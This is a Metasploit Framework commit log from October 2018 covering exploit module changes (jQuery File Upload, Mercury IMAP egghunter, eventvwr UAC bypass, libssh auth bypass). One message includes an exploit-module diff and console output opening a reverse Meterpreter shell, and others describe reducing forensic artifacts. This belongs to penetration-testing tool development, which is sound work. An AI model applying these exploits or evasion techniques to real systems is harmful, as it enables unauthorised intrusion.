William Vu
458f635159
Add supported payloads to module description
2018-10-24 01:30:27 -05:00
William Vu
839c4e0467
Drop rank to AverageRanking for now
2018-10-24 01:30:17 -05:00
William Vu
37560760df
Add RequiredCmd for generic and telnet
2018-10-24 01:23:15 -05:00
Elazar Broad
ef2854c918
Use in-memory reflection for executing the payload
...
Use to_win32pe_psh_reflection() instead of to_win32pe_psh_net() in order to reduce the amount of processes and forensic artifacts created by this module.
2018-10-23 22:12:10 -04:00
Elazar Broad
d75c599929
Use ShellExecuteA to spawn eventvwr.exe
...
Use ShellExecuteA from railgun to spawn eventvwr.exe, as opposed to cmd /c. This reduces the amount of processes generated by this module.
2018-10-23 21:52:36 -04:00
Elazar Broad
da4b424780
Fix typo in cleanup message
2018-10-23 21:33:49 -04:00
bwatters-r7
569c2e03c9
Fix exploit relics and documentation
2018-10-23 17:15:34 -05:00
William Vu
bf5fe2864f
Update module doc
2018-10-23 16:28:49 -05:00
William Vu
67f2933b58
Make fewer assumptions about Apache
...
Returning CheckCode::Safe is too aggressive for a supplemental check.
Admins can change the directive in top-level configuration, anyway.
2018-10-23 16:26:17 -05:00
Shelby Pace
34ae9c38f9
added WebEx modules, arch check
2018-10-23 15:51:23 -05:00
Metasploit
51a8fee018
automatic module_metadata_base.json update
2018-10-23 10:34:37 -07:00
bwatters-r7
927a29530b
Remove duplicated files
2018-10-23 12:31:18 -05:00
Brent Cook
65c0573738
Land #10848 , improve play_youtube post module
2018-10-23 12:26:55 -05:00
Jeffrey Martin
efeacf8666
ensure os_flavor can be supplied for no Windows OS
2018-10-23 12:22:57 -05:00
Metasploit
db9070449c
automatic module_metadata_base.json update
2018-10-23 10:14:24 -07:00
Brent Cook
b65f467ada
Land #10851 , add ndkstager to data/exploits
2018-10-23 12:04:57 -05:00
Brent Cook
e992b63520
Land #10856 , add SSL support to php meterpreter
2018-10-23 11:59:09 -05:00
Brent Cook
e73a568839
Land #10855 , Enable non-session command output for SSH modules
2018-10-23 11:58:16 -05:00
kr3bz
be2ec76ed2
Added modified mercury_login.rb
...
Modified the script with recommendations.
2018-10-23 17:17:30 +02:00
William Vu
9c49acb924
Fail scanner instead of returning
2018-10-23 10:07:38 -05:00
William Vu
9c7a705868
Update module doc
2018-10-23 09:53:46 -05:00
William Vu
58a1b65e60
Update Exploit::CheckCode::Unknown
...
Brain fart.
2018-10-23 09:34:48 -05:00
William Vu
899238a4e3
Update libssh_auth_bypass with command output
2018-10-23 09:34:42 -05:00
William Vu
4182777488
Support SSH shell/exec channel request output
...
Looks like channel[:data] was initialized but never used.
2018-10-23 09:34:12 -05:00
Spencer McIntyre
c71bbc1019
Remove spaces that msftidy caught
2018-10-23 10:13:44 -04:00
Brendan Coles
0e7259040d
Update modules/exploits/windows/imap/mercury_login.rb
...
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:53 +02:00
Brendan Coles
903f5e9ede
Update modules/exploits/windows/imap/mercury_login.rb
...
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:44 +02:00
Brendan Coles
0b37e29c9a
Update modules/exploits/windows/imap/mercury_login.rb
...
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:38 +02:00
Brendan Coles
43dd23042b
Update modules/exploits/windows/imap/mercury_login.rb
...
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:10 +02:00
William Vu
326597e842
Update module doc with new output
2018-10-23 07:14:19 -05:00
William Vu
bdf2d44415
Augment check with Apache Server header
2018-10-23 07:04:14 -05:00
William Vu
0249f1a4af
Improve check method and refactor
2018-10-23 06:20:31 -05:00
Ivan Racic
ee3c663baf
Upgraded exploit to work on any Windows target
...
In short, added egghunter and return address of
the executable file itself, so it should work
on any windows system.
Also, upgraded to modern exploit module requirements.
2018-10-23 12:11:56 +02:00
William Vu
3d06c10ad0
Link to Apache AllowOverride directive and change
2018-10-23 03:51:16 -05:00
William Vu
c9673df3b8
Add WordPress Work The Flow File Upload links
...
As noted by @bcoles, we have a module exploiting this vuln in #5130 ,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.
msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff
diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
post_data = data.to_s
res = send_request_cgi({
- 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
- 'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+ 'uri' => '/jQuery-File-Upload/server/php/index.php',
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Calling payload...")
send_request_cgi(
- 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
- 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+ 'uri' => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
)
end
end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...
[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : ubuntu-xenial
OS : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
Welp.
2018-10-23 03:51:11 -05:00
William Vu
a55f7ff30a
Clarify vuln (re)discovery vs. disclosure
...
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
2018-10-23 03:22:45 -05:00
William Vu
b4bdc52597
Sort path list by frequency
2018-10-22 23:35:42 -05:00
William Vu
df23507772
Add module doc
2018-10-22 23:35:42 -05:00
William Vu
dbc0c802d5
Add detection of additional paths
2018-10-22 23:35:42 -05:00
William Vu
c4f8b6c937
Add rudimentary check method
2018-10-22 23:35:42 -05:00
William Vu
dba7e35819
Refactor slightly with methods
...
And also check upload response.
2018-10-22 23:35:42 -05:00
William Vu
e7ada1a40c
Add timeout on payload request
...
This ensures we don't block on execution.
2018-10-22 23:35:42 -05:00
William Vu
15f14bb295
Add note about Apache .htaccess
2018-10-22 23:35:42 -05:00
William Vu
a986a17bb0
Link to @lcashdol's PoC
2018-10-22 23:35:42 -05:00
William Vu
37dbdbf58f
Update project URL to PR
2018-10-22 23:35:42 -05:00
William Vu
41721c31fb
Add blueimp's jQuery (Arbitrary) File Upload
2018-10-22 23:35:42 -05:00
Spencer McIntyre
7c3e3da8d1
Add documentation for the play_youtube module
2018-10-22 20:50:41 -04:00
Spencer McIntyre
15e67de8fc
Add the EMBED option for play_youtube.rb
2018-10-22 19:51:41 -04:00
William Vu
f40647b2a4
Link to Docker environment in module doc
2018-10-22 18:32:37 -05:00
William Vu
3ca309423a
Add check method to detect 4.3BSD fingerd
2018-10-22 18:32:37 -05:00